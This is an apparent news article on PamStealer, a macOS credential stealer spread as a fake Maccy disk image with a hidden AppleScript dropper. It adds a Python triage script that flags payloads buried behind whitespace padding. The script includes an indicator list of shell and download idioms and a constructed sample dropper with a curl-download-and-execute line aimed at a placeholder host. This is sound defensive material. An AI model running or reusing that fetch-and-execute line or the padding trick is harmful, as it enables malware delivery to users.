Ars Technica, 2 min read

New PamStealer Malware Targets macOS Credentials

Researchers have identified a new macOS malware family, dubbed PamStealer, that is built to steal users' login credentials. The infection chain runs in two stages. The first stage is distributed as a disk image disguised as Maccy, a popular open-source clipboard manager for macOS. The disk image contains an AppleScript whose job is to deliver the second stage.

PamStealer takes its name from the Pluggable Authentication Modules (PAM) interface, the authentication framework macOS uses to check user passwords. The malware, written in Rust, calls PAM to confirm that a captured password really is the target user's current login password. Only after PAM accepts it is the password sent to a server under the attackers' control, so the operators receive working credentials rather than guesses or typos.

Pairing a disk image with an AppleScript dropper is a well-known macOS malware tactic. What sets PamStealer apart is how it uses the pair for stealth: when the AppleScript is opened it launches in the macOS Script Editor, and the malicious code is placed deep within the file, well past what a user or a cursory scan sees at the top, which makes it harder for both security tools and users to notice.
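One practical triage check for this hiding technique is to look for shell-out and download idioms that only appear after a large block of whitespace padding. The script below is an added example for this page, not code from the PamStealer research or from Ars Technica; the indicator list, the 50-line padding threshold and the two sample scripts (including the `example.invalid` hostname) are assumptions constructed here, and the heuristic generalizes beyond this one family to any AppleScript dropper that pads its payload out of view.

```python
"""Triage heuristic for AppleScript droppers whose payload is buried far down
the file behind whitespace padding. Added example for this article; it is not
code from the PamStealer research or from Ars Technica. The indicator list, the
padding threshold and the sample scripts are assumptions constructed here.
"""
import re
import sys
from dataclasses import dataclass, field
from typing import List

# Idioms an AppleScript uses to shell out, fetch a second stage, strip
# quarantine or persist. Assumed generic indicators, not IOCs from the article.
INDICATORS = [
    ("shell-out", re.compile(r"\bdo shell script\b", re.I)),
    ("download", re.compile(r"\b(curl|wget)\b", re.I)),
    ("decode", re.compile(r"\b(base64|xxd|openssl\s+enc)\b", re.I)),
    ("make-exec", re.compile(r"\bchmod\b[^\n]*\+x", re.I)),
    ("unquarantine", re.compile(r"\bxattr\b[^\n]*com\.apple\.quarantine", re.I)),
    ("persist", re.compile(r"\b(launchctl|nohup|crontab)\b", re.I)),
]

# Blank-line run above which the payload is called "buried". Assumed tuning value.
PADDING_THRESHOLD = 50


@dataclass
class Finding:
    line_no: int  # 1-based line in the source
    kind: str     # indicator name from INDICATORS
    text: str     # the offending line, stripped


@dataclass
class Report:
    total_lines: int
    padding_run: int  # longest run of consecutive blank lines
    padding_end: int  # line number where that run ends (0 if none)
    findings: List[Finding] = field(default_factory=list)

    @property
    def buried(self) -> bool:
        """Indicators present, and the first one sits below a large blank block."""
        return (
            bool(self.findings)
            and self.padding_run >= PADDING_THRESHOLD
            and self.findings[0].line_no > self.padding_end
        )

    @property
    def verdict(self) -> str:
        if self.buried:
            return "suspicious: shell/download idiom hidden behind whitespace padding"
        if self.findings:
            return "review: shell/download idiom present near the top of the script"
        return "clean: no indicators"


def scan_applescript(source: str) -> Report:
    """Scan AppleScript source text and report buried-payload indicators."""
    lines = source.splitlines()
    longest = run = padding_end = 0
    for no, line in enumerate(lines, 1):
        if line.strip():
            run = 0
            continue
        run += 1
        if run > longest:
            longest, padding_end = run, no
    findings = []
    for no, line in enumerate(lines, 1):
        for kind, pattern in INDICATORS:
            if pattern.search(line):
                findings.append(Finding(no, kind, line.strip()))
                break  # one finding per line is enough for triage
    return Report(len(lines), longest, padding_end, findings)


# Constructed samples (not real PamStealer artifacts). The dropper shows a
# benign-looking header, 300 blank lines, then a download-and-execute payload.
SAMPLE_DROPPER = (
    "-- Maccy installer helper: press Run to finish setup\n"
    'display dialog "Click OK to install Maccy" buttons {"OK"}\n'
    + "\n" * 300
    + 'do shell script "curl -fsSL https://stage2.example.invalid/p -o /tmp/.p '
    '&& chmod +x /tmp/.p && /tmp/.p"\n'
)
SAMPLE_BENIGN = (
    "-- lists the user's home directory\n"
    'set listing to do shell script "ls -la ~"\n'
    "display dialog listing\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        text = open(sys.argv[1], encoding="utf-8", errors="replace").read()
    else:
        text = SAMPLE_DROPPER
    report = scan_applescript(text)
    print(report.verdict)
    for f in report.findings:
        print(f"  line {f.line_no} [{f.kind}]: {f.text}")
```

Run it against a plain-text `.applescript` file, or first turn a compiled `.scpt` into text with macOS's own `osadecompile file.scpt > file.applescript`. The verdict is a triage hint, not a classification: a padded file with a shell-out deserves a look at what the shell command fetches and executes, while an unpadded `do shell script` in a short utility script is normal.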

This combination of social engineering (a trojanized copy of a trusted app) and abuse of a legitimate system interface (PAM is used as designed, to check a password, rather than exploited through a vulnerability) highlights the evolving threat landscape for macOS users. By evading routine detection and targeting authentication credentials directly, the malware poses a significant risk to user data and to any account that shares the stolen password.

Original source: read the full reporting on Ars Technica.